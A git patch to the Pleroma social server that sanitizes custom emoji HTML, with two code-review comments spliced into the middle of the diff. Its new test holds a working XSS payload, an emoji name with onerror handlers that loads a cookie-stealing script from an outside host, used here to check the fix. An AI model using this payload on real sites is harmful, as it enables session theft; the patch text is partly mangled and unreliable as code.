From 834515fb511ecb8021b81f355cb2d629887edeef Mon Sep 17 00:00:00 2001 From: William Pitcock Date: Sun, 2 Sep 2018 00:04:09 +0000 Subject: [PATCH] formatter: don't add XSS emoji --- lib/pleroma/formatter.ex | 1 + test/formatter_test.exs | 17 ++++++++++++++++- .../representers/activity_representer_test.exs | 2 +- test/web/twitter_api/views/user_view_test.exs | 2 +- 4 files changed, 19 insertions(+), 3 deletions(-) diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex index cf2944c38..9be54e863 100644 --- a/lib/pleroma/formatter.ex +++ b/lib/pleroma/formatter.ex @@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do MediaProxy.url(file) }' />" ) + |> HtmlSanitizeEx.basic_html() end) end diff --git a/test/formatter_test.exs b/test/formatter_test.exs index 95558089b..8453b72ac 100644 --- a/test/formatter_test.exs +++ b/test/formatter_test.exs @@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do text = "I love :moominmamma:" expected_result = - "I love moominmamma" + "I love \"moominmamma\"" assert Formatter.emojify(text) == expected_result end + test "it does not add XSS emoji" do + text = + "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):" + + custom_emoji = %{ + "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" => + "https://placehold.it/1x1" + } + + expected_result = + "I love \"\"" + + assert Formatter.emojify(text, custom_emoji) == expected_result + end + test "it returns the emoji used in the text" do text = "I love :moominmamma:" diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs index 3f85e028b..894d20049 100644 --- a/test/web/twitter_api/representers/activity_representer_test.exs 
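Review bot: The added `|> HtmlSanitizeEx.basic_html()` runs on the whole accumulated `text` inside the per-emoji callback (the `end)` that follows it closes that callback), so the entire post is re-parsed and re-serialized once per emoji, and markup that was already in `text` is rewritten on every pass — the expectation updates in the two view tests of this patch, where attribute quoting flips from `'` to `"`, appear to be a symptom of that. Moving the call to the result of the enclosing reduce, i.e. one `|> HtmlSanitizeEx.basic_html()` after `end)` instead of inside it, keeps the same protection with a single pass. The sanitizer is also the only barrier here: the new test's emoji name begins with `'` followed by event-handler attributes, which only has effect if the name is interpolated unescaped into a single-quoted attribute of the tag string just above (its start is outside the hunk), so escaping or whitelisting the name before interpolation (for example rejecting names outside a constructed pattern like `[A-Za-z0-9_-]`) would close the issue at its source and leave the sanitizer as defence in depth. A comment on the new line, `# sanitize after interpolation: emoji names and file URLs are untrusted`, would record why the call sits here. The enclosing function starts outside the hunk.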
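Review bot: The payload in the new "it does not add XSS emoji" test references a concrete third-party address, `//51.15.235.162.xip.io/cookie.js`; a fixture should not point at a live-looking external host, and a reserved name such as `//example.com/x.js` keeps the test self-contained without weakening it. The assertion also pins the sanitizer's exact serialization of the output, so it will break on any change in how `HtmlSanitizeEx.basic_html/1` quotes or orders attributes, while the property actually being defended is not stated anywhere; adding `refute Formatter.emojify(text, custom_emoji) =~ "onerror"` next to the equality check would express it directly and survive serialization changes. The enclosing test module starts outside the hunk.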
+++ b/test/web/twitter_api/representers/activity_representer_test.exs @@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do } expected_html = - "

2hu

alert('YAY')Some 2hu content mentioning 2hu

alert('YAY')Some \"2hu\" content mentioning
@shp" diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs index 24a5c5bca..7075a2370 100644 --- a/test/web/twitter_api/views/user_view_test.exs +++ b/test/web/twitter_api/views/user_view_test.exs @@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do test "A user with emoji in username", %{user: user} do expected = - "karjalanpiirakka man" + "\"karjalanpiirakka\" man" user = %{ user